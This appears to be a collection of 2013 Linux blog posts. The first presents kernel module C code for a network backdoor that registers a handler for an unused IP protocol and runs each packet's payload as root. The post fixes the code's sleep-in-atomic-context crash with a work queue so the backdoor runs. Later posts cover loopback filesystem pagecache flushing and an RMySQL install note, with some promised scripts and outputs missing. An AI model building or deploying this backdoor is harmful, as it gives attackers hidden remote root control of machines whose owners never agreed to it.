Monday, October 28, 2013

Linux kernel network backdoor

The Ksplice blog has a very nice entry on hosting backdoors in hardware.
The quick summary of this backdoor is:
  1. Register a protocol handler for an unused IP protocol number.
  2. Call call_usermodehelper() to execute the payload of the packet (skb->data).
  3. The remote system now executes, as root, any command you send it.
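The registration in step 1 can be sketched as a minimal kernel module. This is a hedged reconstruction, not the original code: the protocol number (200) and all names here are hypothetical, and the handler body is stubbed out.

```c
#include <linux/module.h>
#include <linux/skbuff.h>
#include <net/protocol.h>

/* Hypothetical unused IP protocol number. */
#define BACKDOOR_PROTO 200

static int backdoor_rcv(struct sk_buff *skb)
{
	/* skb->data points at the payload once the IP header is pulled.
	 * The original code hands this buffer to call_usermodehelper(),
	 * which is exactly the bug discussed below: this handler runs
	 * in softirq context and must not sleep. */
	kfree_skb(skb);
	return 0;
}

static const struct net_protocol backdoor_protocol = {
	.handler = backdoor_rcv,
};

static int __init backdoor_init(void)
{
	/* Step 1: claim the unused protocol number. */
	return inet_add_protocol(&backdoor_protocol, BACKDOOR_PROTO);
}

static void __exit backdoor_exit(void)
{
	inet_del_protocol(&backdoor_protocol, BACKDOOR_PROTO);
}

module_init(backdoor_init);
module_exit(backdoor_exit);
MODULE_LICENSE("GPL");
```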
Unfortunately, it looks like the code is out of date or buggy. Attempting to modprobe the backdoor module generates the following kernel call trace:

Further investigation reveals that this is due to calling a sleeping function from atomic context: call_usermodehelper() eventually calls wait_for_common(), which sleeps, and you must not sleep in an interrupt handler.

The fix is to defer the work: stop doing it in interrupt context and schedule the non-atomic work for later processing.

One possible solution is to use work queues for the deferrable work. Here's an example implementation on github using work queues.
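Since the actual fix lives in the linked repo, here is a minimal sketch of the pattern with hypothetical names: the protocol handler, still in softirq context, only copies the command and queues a work item; the work function runs in process context, where call_usermodehelper() may safely sleep.

```c
#include <linux/workqueue.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/kmod.h>
#include <linux/skbuff.h>

struct backdoor_work {
	struct work_struct work;
	char cmd[256];		/* command copied out of skb->data */
};

/* Runs in process context: sleeping in call_usermodehelper() is fine here. */
static void backdoor_work_fn(struct work_struct *work)
{
	struct backdoor_work *bw = container_of(work, struct backdoor_work, work);
	char *argv[] = { "/bin/sh", "-c", bw->cmd, NULL };
	static char *envp[] = { "PATH=/sbin:/usr/sbin:/bin:/usr/bin", NULL };

	call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
	kfree(bw);
}

/* Called from the protocol handler (softirq context): no sleeping allowed,
 * so we only allocate atomically, copy the payload, and defer. */
static int backdoor_rcv(struct sk_buff *skb)
{
	struct backdoor_work *bw = kmalloc(sizeof(*bw), GFP_ATOMIC);

	if (bw) {
		strlcpy(bw->cmd, skb->data, sizeof(bw->cmd));
		INIT_WORK(&bw->work, backdoor_work_fn);
		schedule_work(&bw->work);
	}
	kfree_skb(skb);
	return 0;
}
```

schedule_work() puts the item on the kernel's shared workqueue, so the handler returns immediately and the blocking call happens later in a worker thread.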

And here's an example session:

Friday, October 11, 2013

Linux: The pagecache and the loop back fs

Linux has a mechanism that allows you to create a block device that is backed by a file. Most commonly, this is used to provide an encrypted fs. All this is fine and dandy. However, you have to factor in that Linux (and practically any other OS) will want to cache the contents of the block device in memory.
The reasoning here is: accessing the contents of a file on disk costs you ~5ms. Rather than incur this cost on future reads, the OS caches the contents of recently used files in a page cache. Future reads or writes to the file hit the page cache, which is orders of magnitude faster than your average disk.
This means that your writes will linger in memory until your backing file's contents get evicted from the page cache. Using O_DIRECT on files that are hosted within the loop-backed fs won't help. You have to force pagecache eviction. The easiest way to do this is a call to fadvise and a sync to force pdflush to write your changes.

Here's an experiment:
I have 3 windows open:
  • One running blktrace  which shows VFS activity.
  • One that has a one-shot dd.
  • One that has a bunch of shell commands that poke around the loop mounted fs.
The experiment is executed in the following order:
  1. An fadvise and a sync at the beginning to make sure the pagecache is clean and all writes are on the FS.
  2. We also print out a couple of stats from /proc/meminfo.
  3. We issue a dd call with direct I/O (oflag=direct).
  4. Print stats from /proc/meminfo and take a look at the backing file using debugfs.
  5. Show how much of the backing file is cached in the pagecache by using fincore.
  6. Evict the pagecache using the fadvise command from linux-ftools.
  7. Force a sync which wakes up pdflush to write out the dirty buffers.
  8. Run debugfs to take a peek at the backing fs again.
  9. Print out some more stats from meminfo.
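Step 3's dd with oflag=direct corresponds to opening the file with O_DIRECT. A minimal sketch of what that flag demands of the caller (all names hypothetical): the buffer, offset, and I/O size must be aligned to the block size, which is why posix_memalign is needed.

```c
#define _GNU_SOURCE		/* for O_DIRECT */
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Write one 4 KiB block bypassing the pagecache, as dd oflag=direct does.
 * Returns 0 on success, -1 on failure (including filesystems that do not
 * support O_DIRECT, such as tmpfs). */
int direct_write(const char *path)
{
	void *buf;
	int fd, ret = -1;

	/* O_DIRECT needs an aligned buffer; 4096 covers common block sizes. */
	if (posix_memalign(&buf, 4096, 4096) != 0)
		return -1;
	memset(buf, 'x', 4096);

	fd = open(path, O_WRONLY | O_CREAT | O_DIRECT, 0600);
	if (fd >= 0) {
		if (write(fd, buf, 4096) == 4096)
			ret = 0;
		close(fd);
	}
	free(buf);
	return ret;
}
```

Note that this only bypasses the pagecache for the file inside the loop-mounted fs; as the experiment shows, the backing file underneath is still cached.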
Here's the script:
And the output generated:
The interesting bit to note here is that writes to a loop-backed filesystem in Linux are not guaranteed to be on disk until you evict the pagecache and force a sync.

If you are interested in digging further, here's debug output from debugfs and dumpe2fs:

Thursday, October 10, 2013

Saturday, October 5, 2013


I ran into an issue installing RMySQL on OS X. I am using R from brew and MySQL from the Oracle download page. Trying to install RMySQL would throw this error:

It turns out that the right solution is really easy: set your MySQL home R env var, make sure that libmysqlclient can be found by R, and configure the RMySQL package with the proper include & lib dirs for MySQL.